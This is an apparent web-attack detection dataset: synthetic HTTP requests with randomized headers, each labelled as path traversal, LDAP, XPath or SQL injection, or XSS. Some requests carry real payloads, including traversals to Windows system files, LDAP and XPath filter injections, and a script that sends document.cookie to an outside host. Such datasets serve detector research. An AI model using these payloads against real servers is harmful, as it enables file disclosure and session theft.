GET /oYp1Gt9FK@LdEc-hQ_o/dlo9p1ljyU7zn2/tCXBo4YyhP-2/opt45f/garslrtasirnwc/saai1cispcnweunk6u.shtml?l3txatRe=Out6smg%27+or+++1%3C++++ett%2Fsi8cs%2FMgng%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D665%5D+++or+++%27Jufdsha%27++%3D+%27&Tkt7_J=8&3t=t22m5&maho=yelot+t4rHh+bmhO+e&NWMZc2zwgethtacces=aC1py&mplnrgl4smiefR=21452&.Exp_MAqGYh=9mdu&hrc9e8vrehub=gt+3eent&1cZbetweenBfqvhtaccesdwp-Q=oT%26&taeyuip6sFe=gwulRV_&hehte8baEeua=50105924&URdWn=+aNdHbor%7Cie&lomtfatqr3atn=57gcipu HTTP/1.0
Host: 116.48.87.242
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: gzip;q=0.9, identity;q=0.7, gzip, compress
Accept-Language: hm-ao
Cache-Control: max-age=70
Client-ip: 77.192.67.6
Cookie: e8veaon=ur;rzn5jeylnnoini=ys29e6h|
Cookie2: $Version="745"
Date: Sun, 31 Oct 04 09:53:50 GMT
ETag: "-RjzUPDGi0.zC78Rw@4@"
Expect: ay2otsbp=eltj
From: wirtsy@nexe4eht.ch
If-Modified-Since: Fri, 22 Sep 06 14:52:54 GMT
If-Unmodified-Since: Sun, 20 Apr 08 22:19:39 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 20 Mar 09 05:57:24 CET
Max-Forwards: 2
MIME-Version: 5.0
Pragma: gu='nbee'
Proxy-Authorization: Digest username="93es"
Authorization: Digest nc=38EfCcD9
Range: 81084-3,1907-384053
Referer: /dchovtO/iubenivu/on7a8/sjm7/Uuorer.dll
TE: gzip,deflate,chunked;q=0.8
Trailer: Accept-Charset
User-Agent: d3totDate/8.4.3.7.0
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 9192x115
Via: 2.1 www.imntat.html, 7.5 79.177.145.70
Transfer-Encoding: o1sa9k
Upgrade: os2eA/3.8, zes2/5.7, z6sc/6.6, jntir/3.8
Warning: 066 177.133.141.195 "uvomreyngrucmsS" "Mon, 08 Mar 10 06:12:12 GMT"
X-Forwarded-For: 17.226.135.24
X-Serial-Number: 5171892279457940
----: -------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 49548
Start - Id: 46001
class: PathTransversal
POST /oXYTVV.U70Oy_F2/erzOerrethGlgew/otn9A/8znn/4i/aosrW1rsittxfghEtut/onfRjhGXgK.1PN/io5dfteppamkYa.html? HTTP/1.1
Content-Length: 138
Content-Language: ijo1re,u
Content-Encoding: identity
Content-Location: http://gm6R.be/rrham/haett57/9aef/Eihe5/oitlalhM.htm
Content-MD5: ZHRhQUhoc2VoeU9sazRjYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 07 Aug 08 07:57:58 UTC
Last-Modified: Tue, 02 May 06 17:36:48 GMT
Host: 18.187.12.173
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.0
Accept-Encoding: identity;q=0.1, identity;q=0.1, gzip, identity
Accept-Language: *
Cache-Control: min-fresh=2764
Client-ip: 195.142.193.180
Cookie: dy4tisahgenrhvl=..\..\..\..\WINDOWS\system.ini
Cookie2: $Version="79"
Date: Tue, 17 Mar 09 12:06:08 GMT
ETag: "hNh1HHRglOOg5HH7eolG"
Expect: 100-continue
From: zh7aer@dn6h.fr
If-Modified-Since: Tue, 15 Feb 05 11:15:38 UTC
If-Unmodified-Since: Tue, 02 Oct 07 10:41:01 GMT
If-Match: "oZhwvs3SoFp93FM"
If-None-Match: *
If-Range: Wed, 23 Nov 05 15:47:02 GMT
Max-Forwards: 5
MIME-Version: 8.3
Pragma: dt=oknhn9ae
Proxy-Authorization: Digest opaque="maoq"
Authorization: eswoqr dMclNrD=emB1
Range: 302-382871,604164-563,-090
Referer: http://www.yfayYEu.st/sdwE/pntewr.php
TE: chunked
Trailer: Warning
User-Agent: Mozilla/9.7 (X11; U; Linux i386 7.6; eH-D5; rv:7.3.9) Gecko/85889515
UA-CPU: x86
UA-Disp: 9962,575,32
UA-OS: Linux
UA-Color: color32
Via: EamE/2.4 www.0rmpjeoz.shtml
Transfer-Encoding: deflate
Upgrade: vysgb/3.2, qh8Atn/8.2
Warning: 820 150.29.252.130 "mcb2NdatgsdhTOusu2o" 
X-Forwarded-For: 87.27.66.152
X-Serial-Number: 971467069198185
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

3t9ncewoe=ntz+rpsargm fnvz&leoGe=8gnrdhurow&ukzmahgHae7D6n=eMtiZq9_&1etp=s39stylebH&caieireco=op&tsdeTooEh=92&yKN-formPm_X5.g=rwlDlt4pDZ

End - Id: 46001
Start - Id: 45821
class: PathTransversal
GET /o2-Vh62c5SVmWf0/nipamrnixnqnoj/nsoiweq3oaiasjertW1f/wb5eSjcan0/tc4uecl/hY3qOZudHIkwyrKv-X/mayanadhtozunl0iiT4v/dCP.asp?dgsaaegt=ryeachomeretc8et&hChUteDl=no&nittatioeTjwa6s=4ulgceunirf&bbmeyc=eSnTkfrG&mtl7raibyhrne=1ortVHuoomNergS&3wgett@BHrW@J=..%5C..%5C..%5C..%5CWINNT%5Csystem.ini HTTP/1.1
Host: www.7iSruo.de
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: shift_jis;q=0.3, big5
Accept-Encoding: *;q=0.1
Accept-Language: tMte-fhkt;q=0.8, Th-n
Cache-Control: no-store
Cookie2: $Version="357"
Date: Tue, 24 Jun 08 03:21:59 CET
If-Unmodified-Since: Sat, 06 Mar 04 08:55:29 GMT
If-None-Match: *
If-Range: "BHEpDFJsJOIj@zv"
Max-Forwards: 16
Proxy-Authorization: NTLM YXJhZmpjaHJlemlsZWNwbXJ0YXVuc2VlaUF0YWQwRXNSb3R5Y2w=
Authorization: Basic ZWNocmI6ZUhzZ3ZFemc=
Referer: http://iTnhp.net/adlaii/ob5ste.gif
TE: gzip;q=0.4,gzip;q=0.8
User-Agent: Mozilla/0.5 (Windows; U; WinNT 4.6; qn-ea; rv:4.0.9) Gecko/87878493
UA-Pixels: 1524x385
Via: ee7haM/9.0 www.tbog.png, 1.7 www.e0orOtoR.tiff
Upgrade: tDye/1.7, Ltt8s/3.6, S1tao/2.0, qyRa2/0.0
X-Serial-Number: 72162010

null

End - Id: 45821
Start - Id: 37649
class: LdapInjection
POST /etoTrieBto/UANDpSupnjH/lttiy7tT/d0m/ceQ@/sP/osedoserbhy9nM/rrVSEIPPNnmKE9c.sh? HTTP/1.0
Content-Length: 206
Content-Language: rt
Content-Encoding: gzip
Content-Location: /qrah/mhnp/onueeqei/e5te.mdb
Content-MD5: Y2FvdGVlbGN0aXQwaWVuaA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 11 May 07 23:26:28 CET
Last-Modified: Sat, 23 Oct 04 22:44:05 UTC
Host: 160.241.117.247:80
Connection: close
Accept: image/jpeg;q=0.1, audio/*;q=0.2
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: fesfa-Yup4a, 8rsxti-DTrodfiO;q=0.3, e1iN-eeepra, Aeiicans-e42iTey;q=0.3
Cache-Control: max-age=8
Client-ip: 76.236.29.239
Cookie: ett=Ail'8e<ombR
Cookie2: $Version="5"
Date: Sat, 11 Mar 06 14:56:45 CET
ETag: "5CsxZ0n_JYvh4GoyRbX"
Expect: 100-continue
From: EEnaeq3@weaSbmldq.fr
If-Modified-Since: Thu, 04 Dec 08 09:04:30 GMT
If-Unmodified-Since: Mon, 27 Aug 07 20:13:38 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 14 Jun 08 22:28:16 CET
Max-Forwards: 900
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM dDlhZXU1bWRlZWFhZWV3YXI1eXNlTHBvb3h1b2h0b3QyZXNJb29sZQ==
Authorization: Digest qop=elac
Range: 7-75,773-,28-851
Referer: http://www.6acEbo.it/av5sWwe/tnUom/sdErgvse/orlzht/reoSLs.shtml
TE: chunked
Trailer: TE
User-Agent: eedege
UA-CPU: PowerPC
UA-Disp: 8272,2255,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 940x1719
Via: 6.3 www.ixees.html
Transfer-Encoding: compress
Upgrade: eithhe/7.7, qnnlt/0.5, 2teem/8.4, rcndti/9.6
Warning: 026 155.240.111.33 "facqeennibgrcecdveu" "Wed, 19 Jul 06 04:22:04 GMT"
X-Forwarded-For: 62.169.63.215
X-Serial-Number: 60981
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

fatmtUi5=w13sPr&etod=axg%aoe88&soEctzhei=eb&dEfe3ida=or&tn=%yae7havingba&huagea6hhmdE=httpl&-5tchildr=)    (   |    ( cn=*o    'brien*  )(mail   =*o  'brien*  ) &TVB7var=+/m\

End - Id: 37649
Start - Id: 44705
class: PathTransversal
PUT /fUb1AxBY@s/eerntcpnn/s0nls3ehts/sczrsedweveT/oOrhukse4cOsnv.swf? HTTP/1.0
Content-Length: 173
Content-Language: sjitil,sna
Content-Encoding: deflate
Content-Location: /qdo6/vtpD/tefg6t/twepots.gz
Content-MD5: ZWViUnkwdGk2YWl5Q2V1bw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 30 Apr 07 05:12:01 UTC
Last-Modified: Sat, 15 Jan 05 18:45:07 CET
Host: 115.211.94.49
Connection: close
Accept: text/*, video/mpeg;q=0.4, audio/basic
Accept-Charset: *;q=0.5
Accept-Encoding: gzip;q=0.3, identity;q=0.9
Accept-Language: *
Cache-Control: no-cache
Client-ip: 159.172.8.1
Cookie: onrtoi=eegebinm;ietaerA7=0;AAsfttbOt2a=trteeueeKgge
Cookie2: $Version="933"
Date: Thu, 02 Apr 09 19:29:24 GMT
ETag: W/"LMhgcAcKZubNHyMAZq"
Expect: eopynrn=ccgFnA
From: aiino4r@HoCiOqeo.be
If-Modified-Since: Fri, 20 Jun 08 24:26:02 CET
If-Unmodified-Since: Fri, 09 Jan 04 03:21:00 CET
If-Match: *
If-None-Match: "u6ngdBhEDc6rGQf5"
If-Range: Tue, 20 Jan 04 09:57:24 UTC
Max-Forwards: 54
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Basic dzZubjptdHlo
Authorization: Basic c2F2bHI6ZWFsbQ==
Range: 8542-,-709
Referer: /jaakoeg/eeurtn.mpeg
TE: trailers,trailers,gzip
Trailer: If-Unmodified-Since
User-Agent: rgLFicxXJz http://www.jomt.fr
UA-CPU: StrongARM
UA-Disp: 7865,313,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 0076x674
Via: HTTP/1.9 22.36.174.181, 7.1 www.eaee.jpeg
Transfer-Encoding: deflate
Upgrade: ncsal/3.2, soi1/9.9, 2ilb/8.2
Warning: 857 185.30.26.113 "mesibeEtevaqn" "Sun, 20 Apr 08 19:11:08 GMT"
X-Forwarded-For: 121.97.240.234
X-Serial-Number: 145776
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

46c=sV7Z36y&fGK6RJKfNn=b2ew&OyfEmRreqTm=/./../../.././../.././../.././../../../&uURwUyd=sriddhaFet9yacf&gfgudfdnonm=t9Delt125&WiUdivcX-H_q=sGQs

End - Id: 44705
Start - Id: 49429
class: XPathInjection
GET /ugtQA/xNgtprUll96mh/2doerojdw/onecersik9aesene.tiff?xZJ8u-=ftnacwei-%27g&gEea=75922&3childbmNIpD=73mD&uhnmsg=lI%40tHsKdv&n2kaoOeatlabe=sm0ti%7Ens&eriz5s=%5CrEt%24&iwvszheoisEsThe=b+sm&htetfhbaAaea=frboot.iniOaqtXr+n+o%3Eh&lvbscriptTAMi@Bxmd=40195&8aweu=o3.h%405&qiasrz=68742+++or++++1%3C++++d%2FsOnaHR%2Fosopcg%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D35%5D+++or+++++27%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&AaiNtnbi8=18824408&azI2oeotepHny7=no&chpgaet1t=yDk&set8rsiGtn=50180 HTTP/1.1
Host: www.ltuhuuotr.org
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: windows-1255
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: no-store
Client-ip: 235.231.116.228
Cookie: j3hendrfthemShe=7438303;eiit=8s&9T
Cookie2: $Version="722"
Date: Sat, 11 Apr 09 11:28:50 GMT
ETag: "6KlxO_9ouuEMb1v4Ilw"
Expect: 100-continue
From: lyE3Znu@romta.biz
If-Modified-Since: Tue, 08 Sep 09 23:53:49 GMT
If-Unmodified-Since: Sat, 25 Oct 08 01:35:51 CET
If-Match: "KcPEIEblBQ-CmKz_cXNo"
If-None-Match: *
If-Range: "22IR6tW9yoh_ewVYLb"
Max-Forwards: 1
MIME-Version: 3.8
Pragma: rp='aa8d'
Proxy-Authorization: Basic dHR0clJ5dTY6Zm9kamM3Yg==
Authorization: o3ae hmns=Egpoigcn
Range: -32,-92418
Referer: http://serin.net/nleiab/eettmeb7/1miEuNt/gtdogo/Ngwh.mdb
TE: chunked,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/0.0 (Windows; U; Win98 3.7; kr-ao; rv:8.2.7) Gecko/82498997
UA-CPU: StrongARM
UA-Disp: 247,139,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 5208x110
Via: hieis/3.4 28.218.103.172
Transfer-Encoding: aeOew; hetnephe=htrooc
Upgrade: e0oOd/9.2, ouh2i/3.3, Ncur/2.5
Warning: 168 www.mBsttTo.jpg "zsvb" "Fri, 02 Nov 07 10:06:41 UTC"
X-Forwarded-For: 43.207.47.88
X-Serial-Number: 812184590933752195
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49429
Start - Id: 36134
class: PathTransversal
GET /J1ZpykxP/ttsreietaosdermei/1jre3bo/dRSruqPIbwymblF7cGU./eQ0MikS5mV8xWFr4/irmHng.3Lvh6Ca/y1sae/d8/bn/lUjVP7p/nmjuUxu.cgi?POgUd=ryJ0U&pna=320323&oLwfsErhtu8O=uautoexec%3Elrroeg&dynwaAtro=r0neojeOaobfs&e3ge=375780&vSkeuf6mesitn=efr2PDBd-&edAaltkn=3en&hayr=..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&dSanib24=sameyjo%2F+qoa&iPzdgvHslefpaa=mow%5D HTTP/1.1
Host: www.canah0e.org
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-ce;q=0.0, x-mac-greek, iso-8859-8;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: max-age=3
Client-ip: 77.156.80.102
Cookie: Ermocha27NNeQcopy=0fGYbn;ic=5
Cookie2: $Version="150"
Date: Fri, 22 Sep 06 06:08:16 UTC
ETag: "lMBZg_LeLLpyz7x8YDp."
Expect: ieg5
From: regt5wfi@r275i.st
If-Modified-Since: Fri, 09 Feb 07 21:31:03 UTC
If-Unmodified-Since: Sat, 10 Oct 09 11:05:22 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 10 May 09 24:01:01 CET
Max-Forwards: 072
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: dv2sl edbc=qyempezk
Range: -535722,74763-864722,-62713
Referer: http://www.mx0yoaea.cz/oososr.cfm
TE: deflate;q=0.7,chunked
Trailer: Proxy-Authorization
User-Agent: Mozilla/0.1 (Machintosh; U; PPC Mac OS X 1.3; st-sr; rv:6.6.8) Gecko/58036263
UA-CPU: MIPS
UA-Disp: 0150,960,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 795x647
Via: 4.7 www.lynTt.js, 8.9 www.semau.css
Transfer-Encoding: gzip
Upgrade: n1LC/2.0, d6dsi/4.8
Warning: 565 www.Stne8T.html "eAh6" "Thu, 04 Dec 08 18:59:50 UTC"
X-Forwarded-For: 129.108.57.155
X-Serial-Number: 6486734154619358
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36134
Start - Id: 38057
class: LdapInjection
GET /oJh7/JH/syejaksiv/oat4EFIcq/4X677.x2access_logmVN/f.wLSEGRxRguP3SI-Q/sO5rGnilzn/optZi_SOO@sock_streamLwindow.openkwgetZ/hDkKSBDAkbvDHyldP.dll?aiLreVtu=%29++++%28++++%7C++++%28displayName%3Dhad*%29+%28name++%3D++++had*+%29%28++++mail%3Dhad*+++%29&G6p24VQK=oncgroup+byt HTTP/1.1
Host: www.b1Eihe9r.com
Connection: keep-alive
Accept: video/mpeg;q=0.2
Accept-Charset: *;q=0.3
Accept-Encoding: compress;q=0.1, gzip, compress;q=0.0, deflate
Accept-Language: miue-elcmn0md, xwigaito-oegmeztn;q=0.5, r-rtm;q=0.5
Cache-Control: no-transform
Client-ip: 26.50.164.170
Cookie: oiqrozW=jzqlwocei;agogpdtraaiu=56;thobslqe=t5a;xRgG5Dyselect=5482;soRmLnOmqatqdah=06595650;7aqeuuoowrv=4302081613
Cookie2: $Version="7"
Date: Wed, 13 Aug 08 24:10:06 CET
ETag: W/"h1oRPtR-U-jQCsTW7"
Expect: 100-continue
From: eoMt7@ridEmrif0e.it
If-Modified-Since: Fri, 03 Apr 09 07:52:24 GMT
If-Unmodified-Since: Sun, 16 Dec 07 01:53:47 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest realm
Range: -5,-848,5-
Referer: http://yl0rollz.org/Hs57/oxRutwhE/a4te.asmx
TE: trailers
Trailer: Warning
User-Agent: Mozilla/7.0 (compatible; MSIE 4.7; Win98; soT6; ebqctdDd)
UA-CPU: Sparc
UA-Disp: 119,1491,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 427x816
Via: tWq/1.4 174.205.206.12
Transfer-Encoding: ieiyT; tesamaNh=xy2s
Upgrade: uw5/3.9, vdsth/9.5, so4/9.1
Warning: 825 116.151.251.79:4332 "d7aga7herbaA" 
X-Forwarded-For: 84.58.38.49
X-Serial-Number: 94095568311644
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38057
Start - Id: 46714
class: XSS
GET /dl2RjNq/0gVh54MxcPBdLQ2dNor1/2LYrMkfwhereS/te/7hsitc9ohaehnTen/rSxmLc/ul2seOsusktts0kec/lrepnnrac8nfwsmef/dfzGTWf.php4?ty=16038629&s9pze=e4hkenmqynwpSrgo5n&cS5t=tDuFPNxV8ug&mSandCmynBwCJ=7ho&Y5Pbgsound=7979078&LstylelCgu=o&t7rgotnffT5aat=e%3FyRds+replace5omfsodedl&xwvdi=dsa&Ert14eraeEas=xgi&arfhianIt=eaxot&aradhfgcrd=a+h%3Bs&nnesEU=gvwDehece7 HTTP/1.1
Host: www.yumhbse0nt.st
Connection: Jeeahie9
Accept: application/*, video/*;q=0.8, audio/*;q=0.8
Accept-Charset: gb2312;q=0.1, big5;q=0.4, iso-8859-4;q=0.4
Accept-Encoding: deflate;q=0.2, identity;q=0.1, deflate, identity;q=0.4
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 1.151.200.187
Cookie: 5iianvdaeGet=[\xC0][\xBC]script >[document.location.replace('http://www.dell.com/cgi-bin/geatraneto.cgi'+document.cookie);][\xC0][\xBC]/script >;BSa8-k=;d;$tmpxp_[ot;kalcSXzHoKH7=e9sVoo@Zo1h;an0rlcrngekas=nrh
Cookie2: $Version="2"
Date: Fri, 31 Oct 08 13:51:58 GMT
ETag: W/"PSuKXHyi87@2uxA"
Expect: hceqis
From: gpA9s@9eee.biz
If-Modified-Since: Fri, 13 Oct 06 20:44:27 UTC
If-Unmodified-Since: Tue, 17 Feb 09 21:04:06 GMT
If-Match: *
If-None-Match: "pNsQFdEXDFgfBnsGWQ"
If-Range: *
Max-Forwards: 4
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Basic T2dkbTp0bWh1d2c=
Authorization: Basic c3RleXRObDp3bnJldXps
Range: -86769,3-4,-55130
Referer: http://www.eemS.ch/avhc/o3np.shtml
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.5 (compatible; Konqueror/7.2; Win98; aa6y; Areeo; eihi6a)
UA-CPU: x86
UA-Disp: 7583,8873,32
UA-OS: FreeBSD
UA-Pixels: 7522x520
Via: FTP/4.6 210.107.208.166, FTP/4.1 www.ti27np.tiff, HTTP/1.8 www.neoma.jpeg
Transfer-Encoding: aOoed
Upgrade: ra3OHS/2.4, t7nn2/8.3, est6nG/7.7, hniHdr/8.1
Warning: 285 www.repb.gif "ctyrNksignP" "Thu, 16 Aug 07 16:54:27 UTC"
X-Forwarded-For: 131.100.225.97
X-Serial-Number: 6715538420
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46714
Start - Id: 48973
class: XPathInjection
GET /eIqqF5OZCYe.M8k/ypad/cg_fNBGMWrSwd._rIl1G/cFBxWb4.jpg?Threpepw=59793&eiboeveSaT=hlpX&0Ex0ridghl=%2Fnoernenqnull%3Er+tc&n2swIen9nb4gc=httpdi+tfd6fPebhDo&seaec=66927041&Upe7gsptlf=411838&smnceMsh=eeafgib%3B%3C&esrOlattshnaib=Lh&oe4processing-instructionYkAXrKz=mlhOno&igGstsoun=nh0&ijisqiatneT=5&faeov5tAnnh=passwd&a4ete=98389++++or++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D++++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or++0530%3D&eSndoeax6sS=11 HTTP/1.1
Host: www.2rebsordoo.cz
Connection: niElsyt
Accept: */*;q=0.2
Accept-Charset: hz-gb-2312;q=0.2, x-mac-arabic, x-mac-arabic;q=0.4
Accept-Encoding: 
Accept-Language: anUinfz-ettrstr;q=0.2, pt-oy22htc, e-Rft, f5nsup-ocie, a-n
Cache-Control: no-store
Client-ip: 196.26.247.32
Cookie: hb1odHw=0061587;ereihbnsen=ecypf6BIIN;XD.WTCrW9LL-=alqmkbJ;yoiehuOi=1297;Relogmgiernwz=621230;sxqoeee=2699452691
Cookie2: $Version="23"
Date: Tue, 29 Apr 08 13:26:44 GMT
ETag: W/"jYHztclesekjaK2po0"
Expect: 100-continue
From: Sd34@Ehnom.cz
If-Modified-Since: Tue, 01 Jan 08 08:42:04 UTC
If-Unmodified-Since: Sat, 01 Oct 05 01:48:58 UTC
If-Match: "JzW6BvOIMdfagAr52dx"
If-None-Match: *
If-Range: "HbC@i-uHkoCB70@3dl7"
Max-Forwards: 8
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: NTLM RmE3Nm9vdGNCZ3BlaXk4ZHJ3aHNiRWVueWRucWVuZ20=
Authorization: ltecs izzi=e1tnnski
Range: 23-,057-,45-
Referer: http://ashu7st.st/eoidw/rhah7b1/fwelesc/aBel3dir/7wfpnd.php3
TE: trailers,deflate,trailers
Trailer: Accept-Encoding
User-Agent: oanriAlt/5.8.9.9.1
UA-CPU: 68000
UA-Disp: 757,752,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 395x881
Via: FTP/5.0 www.aiao.png, 8.9 14.84.215.100
Transfer-Encoding: identity
Upgrade: ridti/5.6, m2mn/9.7, 5cse/3.2, eaEos/5.1
Warning: 932 www.wwas6l.css "3kbciaaakjefi5ciec" "Tue, 30 May 06 18:44:25 CET"
X-Forwarded-For: 235.34.139.147
X-Serial-Number: 544350626543951868
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 48973
Start - Id: 38645
class: LdapInjection
GET /Rconnect/tPc.MokVwYpDd-J2SF/hhcenae9lkdn/n4P6opttv8a@Fvgroup byw/UtHelei/gd/8o3/aJt.sh?dnnm=%29%28++%7C++++%28cn%3D*o+++%27brien*+++%29%28mail++++%3D*o+%27brien*++++%29++&ifunenlhrhvm=gMT2Z0&stbras=so9yIa2rm&gtSTihg=0HnmVHUXJg&zeSlhwejs1cw=uv9aq%3Esi&erset2iro=luA6OKqJ&efa=9dt&7AtuCwhr1st=1CYC&qEfQ6oJeGT=tetfywoi&E0oeo4na4hd6Eh=2960555297 HTTP/1.1
Host: www.dwnehaUne.net
Connection: close
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 48.249.181.128
Cookie: Ydesd=6;hotGsmvp=39917;QHzLspasswdzhtpassa=:D;r1=oPi3o;hcsepxbytmNwsbo=k1lvb8wgoeQ
Cookie2: $Version="43"
Date: Sat, 13 Feb 10 13:24:19 UTC
ETag: "9WmL6Zj2qJvQQYwY"
Expect: sedr=mo9hfett
From: Ta0d@ltoseerIl.gov
If-Modified-Since: Wed, 31 Oct 07 09:36:21 GMT
If-Unmodified-Since: Sat, 13 Aug 05 04:29:56 UTC
If-Match: *
If-None-Match: *
If-Range: "HRH-EFb1dIpQwfhfR"
Max-Forwards: 2
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: NTLM ZXJBcHl0Y2RzZXVvdXBlWmRhbjd0cmp0dnRpNTFmTlJjcmV0aQ==
Authorization: ee1i s6s1sO=fl8rhr
Range: 25834-,48-325537
Referer: /ustdur/Ideatfa/ee1enuve/toai.exe
TE: trailers,trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/1.1 (Windows; U; WinNT 8.8; hd-wo; rv:9.3.1) Gecko/96303103
UA-CPU: Sparc
UA-Disp: 397,637,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 601x4009
Via: 6.3 www.Wet8imi.css, 1.0 www.uaUaEtC.css
Transfer-Encoding: identity
Upgrade: ehlec/7.4, tt07/0.9, ls7e/0.7
Warning: 509 249.249.5.171 "evmsicsfdrnmFbad" 
X-Forwarded-For: 72.129.37.147
X-Serial-Number: 3254523964
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38645
Start - Id: 37334
class: LdapInjection
GET /r5X1nmHx_-WwsF-c/r2CgP/eioE.HmupNIjp4/odtaRrn28csxNga3iatr/o5aZ/38vyICBT06m4juTZdXWv/uvlditatfg6tocax/rKD/pti5lfhyrgaerAt/lu.aspx?fb5t5=yUxdvOb7sDwP&Eorw=c%2Fo+vdhtaccesexp_l%26d1iach+%3D%5D&Sela7Dp=uMazACfwVjG&etdcod04a6Lgs=Ziocm7soiuyHos&Edsti=382&taDhp1ql=ts9&tfgra1etLo=eaendpthbsps&abt8lnaOR7xM70e=8+onksisthtexec&puSwa=wEny%5Dghimochate+netcate%3Ac&sreHk=t&d3S=r HTTP/1.0
Host: www.inniHgvre.ch
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: compress;q=0.5, identity;q=0.2, compress;q=0.2, compress
Accept-Language: ")(targetfilter=(o=NetscapeRoot))
Cache-Control: max-age=33907
Client-ip: 131.232.136.148
Cookie: t1jmail4y-m4b9v=7inasrntae5lhNo;rpetsoDtg=|o6sisttp4R9;mooyoeo=eutyodayphpf;f5lJ=ntOytwtr 
Cookie2: $Version="052"
Date: Thu, 14 Jun 07 16:08:35 GMT
ETag: W/"NJ1.2WEgk_6awsr54"
Expect: 100-continue
From: ddtp@lesT.org
If-Modified-Since: Tue, 17 May 05 06:56:24 GMT
If-Unmodified-Since: Mon, 01 Mar 04 19:06:46 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 21 Oct 04 03:37:35 GMT
Max-Forwards: 92
MIME-Version: 9.0
Pragma: s=ds8vgs53
Proxy-Authorization: lsrrid nactta1e=moee
Authorization: leaN5 tobtnry7=2diiyo
Range: 06765-95986,-6,-81
Referer: http://hpeiaD.com/lttcorn/eerrtho/drcPgl/aATsyt.asmx
TE: gzip,trailers,trailers
Trailer: Range
User-Agent: Mozilla/7.7 (compatible; mrusxteeo; Solaris; epnx; iHNcd; nrroth)
UA-CPU: 68000
UA-Disp: 544,018,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 495x1616
Via: 0.6 178.121.21.218, HTTP/6.0 www.Dei5.html
Transfer-Encoding: deflate
Upgrade: 1ebn/7.7, ncep/4.4, t8re3m/6.5, PXE/8.4
Warning: 644 www.kr8o.htm "Jnrqtdtsr4kgdnb5i" "Fri, 25 Aug 06 23:03:26 GMT"
X-Forwarded-For: 255.193.19.186
X-Serial-Number: 06549032
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37334
Start - Id: 41345
class: SqlInjection
GET /is3fu0tl4Fsrrii24sr/iomp1Y-/mZhkg1tFchs2RfT/zN/icmeeunooo17Iy1aofea/eehthtrseeizgat/ef8rTbui7gwjI/mflliieheB9vDeatiyes/sKV/2ij-o_43Oe.PIqae/rosoidCl4/ifsiEoDxf.dll?eaa=s3qZ-qmpAo&trria=Haas&al=4t%3Anc%29&h5gitemon=o%3FciNestinputeIv&fze5re=gyvtRLj&ltftyhoi=mahEooteseeaidiOst&7lrbtne=saiAkd9rnsLA&ini0pHmqpoh=11759 HTTP/1.1
Host: 238.184.108.58
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: windows-1251, iso-8859-7, x-mac-chinesesimp, windows-874, iso-8859-6
Accept-Encoding: *;q=0.1
Cache-Control: only-if-cached
